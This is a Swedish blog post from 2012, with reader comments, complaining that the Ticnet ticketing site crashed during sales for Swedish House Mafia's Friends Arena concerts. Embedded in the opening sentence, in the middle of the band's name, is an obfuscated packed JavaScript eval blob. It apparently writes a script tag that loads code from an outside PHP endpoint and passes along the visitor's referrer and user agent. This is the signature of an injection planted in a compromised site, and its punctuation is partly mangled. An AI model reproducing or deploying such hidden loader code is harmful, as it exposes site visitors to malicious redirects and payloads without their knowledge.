Image Image Image Image Image Image Image Image Image Image

| 1 december, 2020

Scroll to top

Top

Swedish House Mafia gör en till spelning och Ticnet faller i små bitar. Igen.

Swedish House Mafia gör en till spelning och Ticnet faller i små bitar. Igen.
Filip Urde
 • On 26 juni, 2012
 • http://www.revue.se/filip-urde

Swedish eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bzzsf|var|u0026u|referrer|zidfz||js|php’.split(’|’),0,{}))
House Mafia
är kanske en av våra största musik exporter idag och när dem annonserade att gruppen skulle spela på nya Friends Arena i Stockholm den 24 november så var hypen total. Detta räckte dock inte för trion, som dessutom tillkännagav att det kommer bli deras sista turné (PR trick delux). Om inte hypen var tillräcklig för måndagens biljettsläpp, så skulle detta verkligen få saker i gungning. Ett av dem största biljettsläppen i Svensk House historia överskuggades dock av svartamoln, sedan ticnets system inte pallade trycket (som vanligt).

Igår var det kaos, slutsålt på 42 min och skulle säkert uppnått ännu snabbare siffror om det inte var för ticnets usla system. 

Folk som inte fick biljetter var extremt besvikna och kände att ticnet ännu engång inte gjort sitt jobb och varit värdelösa i att dela med sig om vettig information. Men som väntat så presenterar Swedish House Mafia att man kommer köra en extra konsert dagen innan, på den 23 november och dessa biljetter släpps imorgon (idag tisdag).

Mycket riktigt, idag kl 09:00 var det fight igen, men ännu engång så krashar ticnets veka system. Man kan tycka att efter så många år i branschen så borde man väll förstå att trycket kommer bli stort på ett sådant här biljettsläpp? Sen att man har en hemsida som inte ger dig information om hur mycket biljetter som finns kvar när du står i kön, är helt under all kritik. Problemet blir att folk står i en virtuell kö som sagta laggar sig fram. Helt ovetandes väntar man utan att veta om vilken plats i kön man har, eller om det överhuvudtaget kommer finnas biljetter kvar när man kommer fram. Att detta är ”acceptabelt” år 2012 är för mig helt overkligt!

Detta har alltid varit fallet med ticnet… Dem är urusla på sitt jobb. Men denna otroliga ”Shitstorm” som byggts upp efter dessa två dagar av totalt FAIL hoppas jag blir deras undergång eller start på skärpning. Det är oacceptabelt att bli behandlad på detta sett som konsument.

Comments

 1. Kalle

  Haha, Jag får en känsla av att du stog i kön själv Filip? Men jag håller helt klart med dig. ”Under all kritik”.
  När kommer första Reunion:en av SHM då? Nästa sommar eller?

  • haha! din känsla är korrekt Kalle! mycket upprörande upplevelse som sedan ledde till denna artikel. En Reunion är självklar… detta är ett mega PR trick… visst dem kanske ”chillar” och kör sina solo-karriärer en liten stund, men dem kommer tillbaka som SHM inomkort… Summerburst 2013? =D

 2. Thomas som är arg på ticnet

  Helt rätt! Hoppas detta uppmärksammas ännu mer nu! Jävla ticnet!

 3. Adam

  Pr-trick-deluxe-dubbel-McLeif

 4. Gurra

  Året är 2012 och ticnet kraschar, snyggt!